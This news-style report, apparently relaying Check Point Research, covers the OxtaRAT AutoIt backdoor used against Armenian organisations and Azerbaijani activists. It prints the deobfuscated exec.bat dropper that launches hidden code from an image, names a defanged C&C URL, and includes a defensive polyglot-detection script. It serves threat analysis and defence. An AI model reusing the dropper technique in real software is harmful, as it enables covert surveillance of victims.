Amid growing tensions between Azerbaijan and Armenia over the Lachin corridor, Check Point Research has identified a malware campaign against organizations in Armenia in late 2022. The malware distributed as part of this campaign is a new version of the backdoor we're tracking as OxtaRAT, an AutoIt-based tool for remote access and desktop surveillance, research.checkpoint.com reports.

The newest version of OxtaRAT is a polyglot file that combines a compiled AutoIt script with an image. The tool's capabilities include searching for and retrieving files from an infected machine, recording webcam and desktop video, remotely controlling the infected machine using TightVNC, installing a web shell, and more.

AutoIt is a legitimate tool used by many IT administrators to automate tasks, but it is often abused by threat actors. In this case, the attackers are using a full-featured backdoor containing about 20,000 lines of obfuscated AutoIt code.

"The situation in Artsakh is tense, with frequent ceasefire violations and sporadic outbreaks of violence. For more than two decades, this unresolved, highly militarized ethno-nationalist territorial conflict has remained a source of tension between Armenia and Azerbaijan," the authors note.

The malicious file named Israeli_NGO_thanks_Artsakh_bank_for_the_support_of.scr was submitted to VirusTotal (VT) on November 29, 2022 from an IP address located in Yerevan, Armenia.

It is a self-extracting archive masquerading as a PDF file, complete with a PDF icon. Once executed, it extracts its contents into the Temp folder of the infected device and runs a second self-extracting file named Alexander_Lapshin.EXE. That file, in turn, drops several additional files and launches one of them, the exec.bat script. In its deobfuscated form, this script is very short:

@echo off
xcopy /y /e /k /h /i * %appdata%\Autoit3\
copy /b /y %appdata%\Autoit3\Alexander_Lapshin.pdf %temp%\
run %temp%\Alexander_Lapshin.pdf
run %appdata%\Autoit3\Autoit3.exe %appdata%\Autoit3\icon.png
exit

The exec.bat file is responsible for opening the decoy PDF, which contains the Wikipedia article about Alexander Lapshin. At the same time, in the background, it copies some auxiliary files and the AutoIt interpreter into %appdata%\Autoit3\ and uses the interpreter to execute the malicious AutoIt code hidden inside the image called icon.png.
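A defender can spot this kind of image/AutoIt polyglot without running anything: an image viewer stops reading a PNG at its IEND chunk, so any bytes after it are an overlay the viewer never shows. The checker below (an added example, not Check Point's tooling) walks the PNG chunk list, measures the overlay, and looks in it for the "AU3!EA06" marker that compiled AutoIt3 scripts carry; that marker is an assumption of this example, not something the article states, and the sample PNG is constructed inline.

```python
import struct
import zlib

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
# Signature embedded in compiled AutoIt3 scripts (assumed here; not stated in the article).
AU3_MARKER = b"AU3!EA06"


def png_end_offset(data: bytes) -> int:
    """Walk the PNG chunk list and return the offset just past the IEND chunk.
    Raises ValueError if the data is not a well-formed PNG."""
    if not data.startswith(PNG_MAGIC):
        raise ValueError("not a PNG")
    pos = len(PNG_MAGIC)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        pos += 8 + length + 4          # header + chunk data + CRC
        if ctype == b"IEND":
            return pos
    raise ValueError("no IEND chunk found")


def inspect_png(data: bytes) -> dict:
    """Report how many bytes trail the image and whether they look like compiled AutoIt."""
    overlay = data[png_end_offset(data):]
    return {
        "overlay_bytes": len(overlay),
        "has_autoit_marker": AU3_MARKER in overlay,
    }


def _chunk(ctype: bytes, body: bytes) -> bytes:
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def build_sample_png(payload: bytes = b"") -> bytes:
    """Constructed 1x1 grayscale PNG; `payload` is appended after IEND to mimic a polyglot."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")  # one filter byte + one pixel
    return PNG_MAGIC + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"") + payload


if __name__ == "__main__":
    print(inspect_png(build_sample_png()))                          # clean image
    print(inspect_png(build_sample_png(b"junk" + AU3_MARKER)))      # polyglot with overlay
```

A large overlay on an image that a script interpreter is asked to execute, as exec.bat does with icon.png, is the signal worth alerting on even when no AutoIt marker is present.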

Alexander Lapshin, a Russian-Israeli travel blogger, journalist, and human rights activist, was detained in Belarus in 2016 and extradited to Azerbaijan. He was sentenced to three years in prison for illegally crossing Azerbaijan's internationally recognized borders without permission from Azerbaijani authorities in 2011 and 2012 while visiting Nagorno-Karabakh from Armenia. Nine months after his imprisonment, in September 2017, Lapshin was attacked in solitary confinement in a Baku detention center. Azerbaijani officials publicly declared the attack a suicide attempt. He was then pardoned by the president of Azerbaijan and deported to Israel.

In 2021, the European Court of Human Rights ruled in the case of Lapshin v. Azerbaijan that Azerbaijani authorities had violated Lapshin's right to life and ordered Azerbaijan to pay 30,000 euros in compensation. After the verdict, Lapshin publicly posted a photo of the credit card, issued by the Armenian Artsakhbank, that he had opened to receive the compensation. This incident probably made Lapshin's name attractive to the attackers who targeted the bank.

Previous versions of the OxtaRAT backdoor were used in earlier attacks on Azerbaijani political and human rights activists, or, where the targets were not publicly disclosed, their lures referred to the tensions between Azerbaijan and Armenia over Artsakh. The older versions of OxtaRAT have significantly less functionality than the new one, but they share similar code, the names of most commands, and the same C&C communication scheme.

Last February, Qurium reported another attack, this time on Abulfaz Gurbanly, an Azerbaijani political activist. The attackers posed as BBC journalists and, as in the June 2021 attacks, sent the victim an email containing a Google Drive link pointing to a password-protected RAR archive called BBC-suallar.rar ("BBC questions"). Again, a compiled AutoIt executable called suallar.scr was extracted, this time masquerading as a Word document with a Word icon. Once executed, it displayed a decoy DOC file called smm-fraza.doc.

In the background, it downloaded another version of OxtaRAT from the C&C server https://smartappsfoursix[.]xyz/wp-feed.php and ran it. This version is more advanced than the one used in the 2021 attacks, with many additional commands.

All the samples from this and previous campaigns are linked to the interests of the Azerbaijani government; they either target Azerbaijani political and human rights activists or, if the targets have not been publicly disclosed, refer to the tense relations between Azerbaijan and Armenia over Artsakh, the article notes.
